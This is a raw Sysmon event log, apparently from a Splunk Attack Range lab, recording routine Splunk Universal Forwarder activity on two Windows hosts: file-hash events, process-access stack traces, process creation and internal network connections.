Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66D5457BB709A4D2DCDD5301F74D319,SHA256=2CF2BA8E25DC54E20827FCB5F71508A4A6C25EF01CB431DE2AC47837159089BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:15.075{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97FCA2389ED34BC446D76A014429902E,SHA256=7E25005C23F03919A8AA53385FB6CB7CB12DB1E4BA796FB5B0204B393AF86616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:16.723{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A7C3CF1F5CCC9CD9A1027A30EB24489,SHA256=DEBBD8776BD00E2329BF772FAD2F1BAEB4C95357D450410AAD7E4653123AE7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:16.091{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0641E4E0FB11721E8367CE4318FE239F,SHA256=4EABA189CAFB1BAEC348D417CCCEF6D17C01033FFF93C913945844FA4BEA19DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:17.739{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C60E11F9B39FFB94D01886D12F8B24D,SHA256=9F12F2D3137E220B51AB9A5BE7CFAF1AE4414B5B02C30D0896A65E74AF3ED80C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:17.106{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C71EFDD7C913127B5A9D6F1DA8A55A77,SHA256=AD116DE4959EC689786C1934E4FFD6EB73C0389341741156D997A28A0D5B61FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:18.786{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FF3EBC4E929D88B0EA98F0DF46B2DD8,SHA256=6124AED551DE7C971704F78D270AF786BA4DEC435B8D5A4027169EDFBAF87E79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:18.294{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E1D6D51366F843D11A0500D8340AB5D,SHA256=827D2B4AB1FE79B3A6B583408585F77CA7A8F36F67CB86705EEA9CE745F1FB12,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:17.571{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51204-false10.0.1.12-8000- 23542300x8000000000000000214653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:19.786{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95B0B8CB3D401CB98EF46CE1CBD87234,SHA256=B84C03F0110D16389D6A684546A57330E6F1FDECDA8CB7D9E6B74AF8E38B7C7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.684{C8EA50B7-0ED7-6216-B604-000000003802}47764192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.482{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63D8AE49E41554AB904EC0B0D1A76E5C,SHA256=47169EBF3CAB66B8A087A3E2030BF4D0AB7E0886412D4059143D00CE139798EF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0ED7-6216-B604-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0ED7-6216-B604-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0ED7-6216-B604-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:19.466{C8EA50B7-0ED7-6216-B604-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000285559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:17.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53266-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000285558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.872{C8EA50B7-0ED8-6216-B804-000000003802}57125748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0ED8-6216-B804-000000003802}5712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0ED8-6216-B804-000000003802}5712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.638{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0ED8-6216-B804-000000003802}5712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.639{C8EA50B7-0ED8-6216-B804-000000003802}5712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.497{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413D6227EB4655C8F12EA0F234F2B531,SHA256=70CFCE0DCE50C3A6297AD3FEA2DC8244FB2329833C5441403D82373E06375DAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:20.973{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7D8AC4375A8BDB757C5F3F0EFE9F5E,SHA256=0E334CB7B99E4ACC6D3DECAF83EAB72CAE36B5BB8FF8C4498D3F03C13402296B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C504098ACC63DCEEE22411F70CD997E,SHA256=3DD8E44D3054D8415C6B65A53EDADF6DE8C77FD4239B6092E3EDF6E9CEF85643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9522F7DA080006F4216E9A9D382A3247,SHA256=F5B6849B94E2230CA0DA2A6FCB047DA19C1EA7238C77068198F5ED30C280DAFB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.372{C8EA50B7-0ED8-6216-B704-000000003802}11485296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0ED8-6216-B704-000000003802}1148C:\Program 